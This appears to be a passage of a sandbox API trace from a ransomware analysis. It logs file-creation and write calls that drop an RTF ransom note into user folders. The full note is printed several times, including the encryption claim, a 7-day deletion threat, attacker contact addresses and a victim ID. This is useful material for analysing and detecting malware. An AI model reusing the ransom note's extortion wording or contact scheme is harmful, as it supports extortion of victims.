Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nóÖÏÅÂÁÊz\x0b|\x14…§o\x15Ô\x09ØÕ*bªí\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0286.377] WriteFile (in: hFile=0x2e8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.378] CloseHandle (hObject=0x2e8) returned 1 [0286.378] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0286.378] GetLastError () returned 0x2 [0286.378] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0286.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.379] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 